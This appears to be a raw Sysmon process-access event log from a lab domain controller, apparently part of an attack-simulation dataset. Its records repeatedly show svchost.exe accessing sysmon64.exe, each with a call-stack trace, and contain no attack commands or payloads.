12:01:02.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002017Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002016Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002015Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002014Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002013Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002012Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002011Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002010Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002009Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002008Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002007Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002006Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002005Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002004Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002003Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002002Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002001Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002000Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001999Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001998Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001997Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001996Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001995Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001994Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 